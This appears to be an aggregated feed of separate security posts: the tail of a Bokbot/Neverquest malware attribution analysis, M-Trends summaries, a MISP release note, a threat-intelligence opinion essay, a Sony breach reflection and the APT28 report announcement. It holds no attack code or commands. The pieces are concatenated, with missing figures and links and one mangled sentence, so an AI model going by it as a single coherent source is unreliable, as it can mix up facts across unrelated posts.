Notice how the redirect URL contains $1 and $2, just as with Neverquest. This could of course be a coincidence but it should be mentioned that this is something that has only been observed in Neverquest and Bokbot.

Reporting config

This config was one of the very first things that hinted about a connection between the two groups. By comparing the configs it becomes quite clear that there is a big overlap in interesting keywords and URLs:


Neverquest is on the left and Bokbot on the right. Note that this is a simple string comparison between the configs which also includes URLs that are to be excluded from reporting.

“Guilt by association” – Affiliations

None of these groups are short on connections in the cybercrime underworld. It’s already mentioned that Neverquest had ties with Dyre, a group which by itself caused substantial financial losses. But it’s also important to take into account that Dyre didn’t completely go away after the group got dismantled but was rather replaced with TheTrick which gives a further hint of a connection.

Neverquest affil. Bokbot affil. Comment
Dyre TheTrick Neverquest downloads & executes Dyre
Bokbot downloads & executes TheTrick
TinyLoader TinyLoader Neverquest downloads & executes TinyLoader which downloads AbaddosPOS
Bokbot downloads & executes TinyLoader, additional payload remains unknown at this time
Chanitor Chanitor Neverquest utilizes Chanitor for distribution of Neverquest
Bokbot utilizes Chanitor for distribution of Bokbot, downloads SendSafe spam malware to older infections.
Geodo Bokbot utilizes Geodo for distributing Bokbot
Gozi-ISFB Bokbot utilizes Gozi-ISFB for distributing Bokbot

There are a few interesting observations with the above affiliations. The first is for the Chanitor affiliation.

When Bokbot was being distributed by Chanitor, an existing Bokbot infection that was running an older version than the one being distributed by Chanitor, would receive a download & execute command which pointed to the SendSafe spambot, used by the Chanitor group to send spam. Suggesting that they may have exchanged “infections for infections”.

The Bokbot affiliation with Geodo is something that cannot be linked to Neverquest, mostly due to the fact that Geodo has not been running its spam operation long enough to overlap with Neverquest.

The below graph show all the observed affiliations to date.


Events over time

All of the above information have been collected over time during the development and tracking of Bokbot. The events and observations can be observed on the below timeline.


The first occurrence of TheTrick being downloaded was in July 2017 but Bokbot has since been downloading TheTrick at different occasions.

At the end of December 2017 there was little Bokbot activity, likely due to the fact that it was holidays. It’s not uncommon for cybercriminals to decrease their activity during the turn of the year, supposedly everyone needs holidays, even cybercriminals. They did however push an inject config to some bots which targeted *.com with the goal of injecting Javascript to mine Monero cryptocurrency. As soon as an infected user visits a website with a .com top-level domain (TLD), the browser would start mining Monero for the Bokbot actors.  This was likely an attempt to passively monetize the bots while the actors was on holiday.

Bokbot remains active and shows no signs of slowing down. Fox-IT will continue to monitor these actors closely.

M-Trends 2017: A View From the Front Lines

Every year Mandiant responds to a large number of cyber attacks, and 2016 was no exception. For our M-Trends 2017 report, we took a look at the incidents we investigated last year and provided a global and regional (the Americas, APAC and EMEA) analysis focused on attack trends, and defensive and emerging trends.

When it comes to attack trends, we’re seeing a much higher degree of sophistication than ever before. Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two. These groups have greatly upped their game and are thinking outside the box as well. One unexpected tactic we observed is attackers calling targets directly, showing us that they have become more brazen.

While there has been a marked acceleration of both the aggressiveness and sophistication of cyber attacks, defensive capabilities have been slower to evolve. We have observed that a majority of both victim organizations and those working diligently on defensive improvements are still lacking adequate fundamental security controls and capabilities to either prevent breaches or to minimize the damages and consequences of an inevitable compromise.

Fortunately, we’re seeing that organizations are becoming better are identifying breaches. The global median time from compromise to discovery has dropped significantly from 146 days in 2015 to 99 days 2016, but it’s still not good enough. As we noted in M-Trends 2016, Mandiant’s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment, so 99 days is still 96 days too long.

We strongly recommend that organizations adopt a posture of continuous cyber security, risk evaluation and adaptive defense or they risk having significant gaps in both fundamental security controls and – more critically – visibility and detection of targeted attacks.

On top of our analysis of recent trends, M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year. FaaS monitors organizations 24/7, which gives them a unique perspective into the current threat landscape. Additionally, this year we partnered with law firm DLA Piper for a discussion of the upcoming changes in EMEA data protection laws.

You can learn more in our M-Trends 2017 report. Additionally, you can register for our live webinar on March 29, 2017, to hear more from our experts.

Toolsmith Release Advisory: Malware Information Sharing Platform (MISP) 2.4.52

7 OCT 2016 saw the release of MISP 2.4.52.
MISP, Malware Information Sharing Platform and Threat Sharing, is free and open source software to aid in sharing of threat and cyber security indicators.
An overview of MISP as derived from the project home page:
  • Automation:  Store IOCs in a structured manner, and benefit from correlation, automated exports for IDS, or SIEM, in STIX or OpenIOC and even to other MISPs.
  • Simplicity: the driving force behind the project. Storing and using information about threats and malware should not be difficult. MISP allows getting the maximum out of your data without unmanageable complexity.
  • Sharing: the key to fast and effective detection of attacks. Often organizations are targeted by the same Threat Actor, in the same or different Campaign. MISP makes it easier to share with and receive from trusted partners and trust-groups. Sharing also enables collaborative analysis, preventing redundant work.
The MISP 2.4.52 release includes the following new features:
  • Freetext feed import: a flexible scheme to import any feed available on Internet and incorporate them automatically in MISP. The feed imported can create new event or update an existing event. The freetext feed feature permits to preview the import and quickly integrates external sources.
  • Bro NIDS export added in MISP in addition to Snort and Suricata.
  • A default role can be set allowing flexible role policy.
  • Functionality to allow merging of attributes from a different event.
  • Many updates and improvement in the MISP user-interface including filtering of proposals at index level.
Bug fixes and improvements include:
  • XML STIX export has been significantly improved to ensure enhanced compatibility with other platforms.
  • Bruteforce protection has been fixed.
  • OpenIOC export via the API is now possible.
  • Various bugs at the API level were fixed.
This is an outstanding project that will be the topic of my next Toolsmith In-depth Analysis.

Cheers...until next time.

M-Trends Asia Pacific: Organizations Must Improve at Detecting and Responding to Breaches

Since 2010, Mandiant, a FireEye company, has presented trends, statistics and case studies of some of the largest and most sophisticated cyber attacks. In February 2016, we released our annual global M-Trends® report based on data from the breaches we responded to in 2015. Now, we are releasing M-Trends Asia Pacific, our first report to focus on this very diverse and dynamic region.

Some of the key findings include:

  • Most breaches in the Asia Pacific region never became public. Most governments and industry-governing bodies are without effective breach disclosure laws, although this is slowly changing.
  • The median time of discovery of an attack was 520 days after the initial compromise. This is 374 days longer than the global median of 146 days.
  • Mandiant was engaged by many organizations that have already conducted forensic investigations (internally or using third parties), but failed to eradicate the attackers from their environments. These efforts sometimes made matters worse by destroying or damaging the forensic evidence needed to understand the full extent of a breach or to attribute activity to a specific threat actor.
  • Some attacker tools were used to almost exclusively target organizations within APAC. In April 2015, we uncovered the malicious efforts of APT30, a suspected China-based threat group that has exploited the networks of governments and organizations across the region, targeting highly sensitive political, economic and military information.

Download M-Trends Asia Pacific to learn more.

Beyond the Buzzwords: Why You Need Threat Intelligence

I dislike buzzwords.

Let me be more precise -- I heavily dislike when a properly useful term is commandeered by the army of marketing people out there in the market space and promptly loses any real meaning. It makes me crazy, as it should make you, when terms devised to speak to some new method, utility, or technology becomes virtually meaningless when everyone uses it to mean everything and nothing all at once. Being in a highly dynamic technical field is hard enough without having to play thesaurus games with the marketing people. They always win anyway.

So when I see things like this post, "7 Security buzzwords that need to be put to rest" on one hand I'm happy someone is out there taking the over-marketing and over-hyping of good terms to task, but on the other hand I'm apprehensive and left wondering whether we've thrown the baby out with the bath-water.

In this case, if you look at slide 8, Threat Intelligence, you have this quote:
"This is a term that has been knocked about in the industry for the last couple of years. It really amounts to little more than a glorified RSS feed once you peel back the covers for most offerings in the market place."

I'm unsure whether the author was going for irony or sarcasm, or has simply never seen a good Threat Intelligence feed before -- but this is just categorically wrong. Publishing this kind of thing is irresponsible, and does a disservice to the reading public who take these words for truth from a journalist.

Hyperbole and Irony

Let's be honest, there are plenty of threat intelligence feeds that match that definition. I can think of a few I'd love to tell you about but non-disclosure agreements make that impractical. Then there are those that provide a tremendous amount of value when they are properly utilized at the proper point in time, by the proper resources.

Take for example a JSON-based feed of validated, known-bad IP addresses from one of the many providers of this type of data. I would hardly call this intelligence, but rather reputational data in the form of a feed. Sure, this is consumed much like you would an RSS feed of news -- except that the intent is typically for automated consumption by tools and technologies that requires very little human intervention.

Is the insinuation here that this type of thing has little value? I would agree that in the grand scheme of intelligence a list of known-bad IP addresses has a very short shelf-life and an complicated utility model which is necessarily more than a binary decision of "good vs. bad" -- but this does not completely destroy its utility to the security organization. Take for example a low-maturity organization who is understaffed, and relies heavily on network-based security devices to protect their assets. Incorporating a known-bad (IP reputation) feed into their currently deployed network security technologies may be more than a simple added layer of security. This may in fact be an evolution, but one that only a lower-level security organization can appreciate.

My point is, don't throw away the potential utility of something like a reputation feed without first considering the context within which it will be useful.

Without Intelligence, We're Blind

I don't know how to make this more clear. After spending a good portion of the last 4 months studying successful and operational security programs I can't imagine a scenario where a security program without the incorporation of threat intelligence is even viable. I'm sorry to report that without a threat-intelligence focused strategy, we're left deploying the same old predictable patterns of network security, antivirus/endpoint and other static defenses which our enemies are well attuned to and can avoid without putting much thought into it.

While I agree, the marketing organizations in the big vendors (and small, to be fair) have all but ruined the reputation of the phrase threat intelligence I dare you to run a successful security program without understanding your threats and adversaries, and be successful at efficient detection and response. Won't happen.

I guess I'm biased since I've spent so much time researching this topic that I'm now what you may consider a true believer. I can sleep well knowing that thorough (and ongoing) research into successful security programs which incorporate threat intelligence leads me to conclude that threat intelligence is essential to an effective and focused enterprise security program. I'm still not an expert, but at least I've seen it both succeed and fail and can tell the difference.

So why the hate? Let's ideate

I get it, security people are experiencing fatigue from buzzwords and terms taken over by marketing people which makes our ears bleed every time someone starts making less than no sense. I get it, I really do. But let's not throw away the baby in the bathwater. Let's not dismiss something that has the potential to transform our security programs into something relevant to today's threats because we're sick of hearing talking heads mis-use and abuse the term.

I also get that when terms are over-hyped and misused it does everyone an injustice. Is an IP reputation list threat intelligence? I wouldn't call it's just data. There are hallmarks of threat intelligence that make it useful and much more than just a buzzword:

  1. it's actionable
  2. it's complete
  3. it's meaningful
Once you have these characteristics for your threat intelligence "feed" then you have significantly more than just an RSS feed. You have something that can act as a catalyst for your security program stuck in the 90's. Let's not let our pull to be snarky get the best of us, and throw away a perfectly legitimate term. Instead, let's take those who mis-use and abuse the term and point them out and call them out for their disservice to our mission.

The Absolute Worst Case – 2 Examples of Security’s Black Swans

You know that saying "It just got real"? If you're an employee of Sony Pictures - it just got real. In a very, very bad way. There are reports that the entire Sony Pictures infrastructure is down, computer, network, VPN and all - and that there isn't an ETR on target.

There are reports that there is highly sensitive information being held for "ransom", if you can call it that, by that attackers. There is even some reporting that someone representing the attackers has contacted the tech media and disclosed that the way they were able to infiltrate so completely was through insider help. In other words, the barbarians were literally inside the castle walls.

If you work in enterprise security I don't need to explain to you how bad this is, or how thoroughly this type of compromise breaks every single contingency plan most companies (outside the government, defense space) have in place. This compromise, an "IT matter" as Sony Pictures' PR calls it, is epic levels of bad.

Definition of Black Swan event, for clarity:
"The black swan theory or theory of black swan events is a metaphor that describes an event that comes as a surprise, has a major effect, and is often inappropriately rationalized after the fact with the benefit of hindsight."
--Source: Wikipedia--

You can read some fantastic reporting on the issue here:

Although I truly do not envy those poor souls in Enterprise Security over at Sony Pictures, it's the broader implications of this kind of attack that seriously concern me. This isn't the first time we've seen this type of attack - where the attackers had complete and total access (allegedly) into the infrastructure of the enterprise. It won't be the last time. So can we learn something here, and take it with us going forward? I think we can, if we're willing to pay attention.

I'd like to pose a few hypothetical scenarios here, given the lesson we're learning again from this unfortunate case- and what can or should be done to avoid being, to put it mildly, thoroughly screwed.

Case- Insider Threat / Rogue Insider
Insider threats are the stuff of myth in much of enterprise security. We hear a lot about how dangerous they can be but it's rare that someone actually comes forward with a first-hand account. If this incident is truly an insider threat (rogue employee, aiding an outside attacker) then it will be a case used for years to illustrate the point.

Insiders hold a special place in the nightmares of enterprise security professionals. Mostly because much of our defenses are positioned at our borders so when someone who has access and is a trusted insider goes rogue we have very little recourse. This is the continuing problem we see as defenders - the M&Ms paradigm. Hard outer shell, soft chewy middle.

A lifetime ago when I was leading up enterprise security engineering our team had discussions about how we were going to protect ourselves against this type of threat. We knew we had malicious insiders in many places with deep access and deeper pockets - so rooting them out wasn't going to work. If you can't keep them out then what's the next line of prevention? Maybe it's a little bit of 1990's technology like segmentation of network assets, separation of duties, and tight identity and access management controls. Further that, we profile people's behaviors and look to build operational baselines - I know this is much easier said than done, no need to repeat.

So what happens when prevention fails, often catastrophically and publicly? We turn to detection and response. Failure to prevent isn't failure, it's a fail in the kill chain, forcing us to move to the next step down. Detection, swiftly and silently, is the next big key. Again, if you don't know what normal looks like you will never know what abnormal deviation is, I hope that's intuitive. I've never known an attacker that gets caught by an IPS signature - mainly because there is no such thing. So again, what does detection look like? I think it comes down to detecting deviations (even if they're subtle) in behavioral patterns of humans and/or systems. I don't think you need to spend a million dollars to do it. Maybe it's enough to use Marcus Ranum's "never-seen-before" idea. Take key assets, and build access tables for who accesses, how frequently, and when. Then look for net-new access (even if it's legal/allowed) and investigate. Sure, you may technically have access to that HR share, but you really shouldn't be accessing it, and under normal conditions you wouldn't.

But what if the things you're stealing as an insider threat are the things you work with and have access to every day. Well, then we focus on exfiltration (deeper down the kill chain). How does it leave your environment? Can you prevent people from taking data out of your network, or at least catch them when they try? I'm fairly confident the answer is no if it's just a general question - but if you can identify and tag at some meta-level things that are critical, really critical, to your organization maybe you can find when it's trying to leave the infrastructure without permission? I don't know the answer here mainly because one answer isn't going to solve all of the problems out there, and it's a "well, it depends" answer based on your company profile.

I can tell you this though, insider threats are models for using kill chain analysis.

Recovering from an insider is a little more difficult, particularly when you don't know who they are. Insiders can burrow deep, and stay hidden for a long time - sometimes going completely undiscovered. This means that if you're fairly sure you've been compromised by a malicious insider, but can't identify the attacker, you're in for a rough go at trying to figure out what state to restore to. Do you restore your network/infrastructure to 2 days ago? 2 weeks ago? 2 months ago? The answer is uncertain until you find and profile the attacker. Once you do, you're likely to discover that you can't trust much of your infrastructure telemetry if the attacker was well-hidden. Covering their tracks is something "advanced" adversaries are good at.

The things to think about here are two-fold. First - you need to identify and attribute the attack to someone, or a group. Post-haste. Yesterday speeds. You need to know who they are, so you can start tracing their steps and figure out what they did, when they did it, and the extent of the potential damage. If you can't figure this out quickly, getting the infrastructure to a working state may not do you any good because it could still be compromised in that state, or could leave you open to another run at compromised further down the line when you believe you've removed the threat.

Second, you need to restore services and bring back the business. Today many companies simply cease to exist without IT. If you want to degrade or destroy a company - take away their ability to network and communicate. The battle of service restoration versus security analysis will be bitter, and  you'll probably lose as the CISO. Restore services, and figure out what's going on, maybe in parallel, maybe not - but that first step is almost universal with the notable exception of a few industry segments where being secured is as critical as being online.

Case- Compromised Core Infrastructure
Nothing says you're about to have a bad day like the source of a major attack on your enterprise coming through your endpoint management infrastructure. This starts to feel a lot like an insider threat - although it doesn't necessarily have to be. I can't even imagine the horror of finding out that your endpoint patching and software delivery platform has been re-purposed to deliver malware to all of your endpoints and that it has been the focal point of your adversary's operations. If you can't trust your core infrastructure - what can you trust?

Perhaps trust is the wrong way to look at it, as my friend Steve Ragan pointed out. So what then?

Within the enterprise framework there has to be some piece of infrastructure that is trusted. Maybe it's a system that stays physically offline (off?) until it's critically needed with alternate credentials and operational parameters. Maybe it's a recovery platform that you have a known-good hash of so that you can quickly validate you're working with the genuine article. Maybe it's something else, but you have to have something to trust.

If you have a compromised core infrastructure, I think you're looking at one of two options. Option A is restoring your systems to a questionable state (but not obviously compromised and usable) and working backwards to find the intruder. Option B is closing everything down and re-deploying everything and starting from scratch. Option B may very well sound like the more security-sound option until you factor in the actual data. Nothing says your data can't be's not just about windows credentials. Maybe some of your company's top-secret documents are PDFs. Maybe the attacker was clever and trojaned all of your PDFs such that as soon as one is opened, the compromise starts all over again.

I seriously doubt that would be detected because it's likely custom-written code and won't pop up on all but the most sophisticated (dare I say "next ten") detection tools.

My suggestion here? Start with the inner-most critical components of your infrastructure, audit and reset credentials and work your way out in concentric rings until you start to get to components which you can actually get by without. This exercise should keep your operations teams busy for a while, and you can maybe even get a parallel incident response investigation going in the mean time. On the plus side, this gives you a tiny window within which to start to build things better from the ashes. Or maybe not since you'll be going at light speed plus 1mph. This is, however, the only advice that makes sense. It's also the only advice I can give you that I have actually tried myself - and as painful as it sounds, believe me when I say that in real life it's significantly worse.

Before this post gets to long (or have we long crossed that bridge?) I think it's safe to say that very few of you reading this post are operationally prepared to handle this type of incident where you've either got a malicious insider who has gone undetected and wreaked utter chaos, or a compromised core infrastructure by an outsider - or both if you're won the crap lottery. That's a problem because this is our black swan. This is our version of planes with hijackers flying into buildings. We know it's a possibility, but none of us have the resources to do prepare, and let's face it - we have bigger problems. Except that these incidents are real. And the Black Swan is real. It happens. Now what?

Does this adjust your world view, or risk model for your organization somehow? If so, in what way? Will you start taking the insider threat more seriously as a result? Why or why not... and how? By my unscientific calculation there are probably .05% of companies out there who have the capital and the resources to pull off recovering from one of these Black Swan events, with anything even resembling success. The rest of us in the enterprise? What do we do when the worst-case happens?

I'm curious on how you see things. Leave a comment here, or take the conversation to Twitter with the hashtag #DtSR - let's talk about it. I think we can learn something from the horrendous situation Sony Pictures is living right now - let's not waste a teachable moment for everyone, collectively, to get even a tiny bit better.

APT28: A Window into Russia’s Cyber Espionage Operations?

The role of nation-state actors in cyber attacks was perhaps most widely revealed in February 2013 when Mandiant released the APT1 report, which detailed a professional cyber espionage group based in China. Today we release a new report: APT28: A Window Into Russia’s Cyber Espionage Operations?

This report focuses on a threat group that we have designated as APT28. While APT28’s malware is fairly well known in the cybersecurity community, our report details additional information exposing ongoing, focused operations that we believe indicate a government sponsor based in Moscow.

In contrast with the China-based threat actors that FireEye tracks, APT28 does not appear to conduct widespread intellectual property theft for economic gain. Instead, APT28 focuses on collecting intelligence that would be most useful to a government. Specifically, FireEye found that since at least 2007, APT28 has been targeting privileged information related to governments, militaries and security organizations that would likely benefit the Russian government.

In our report, we also describe several malware samples containing details that indicate that the developers are Russian language speakers operating during business hours that are consistent with the time zone of Russia’s major cities, including Moscow and St. Petersburg. FireEye analysts also found that APT28 has systematically evolved its malware since 2007, using flexible and lasting platforms indicative of plans for long-term use and sophisticated coding practices that suggest an interest in complicating reverse engineering efforts.

We assess that APT28 is most likely sponsored by the Russian government based on numerous factors summarized below:

Table for APT28

FireEye is also releasing indicators to help organizations detect APT28 activity. Those indicators can be downloaded at

As with the APT1 report, we recognize that no single entity completely understands the entire complex picture of intense cyber espionage over many years. Our goal by releasing this report is to offer an assessment that informs and educates the community about attacks originating from Russia. The complete report can be downloaded here: /content/dam/legacy/resources/pdfs/apt28.pdf.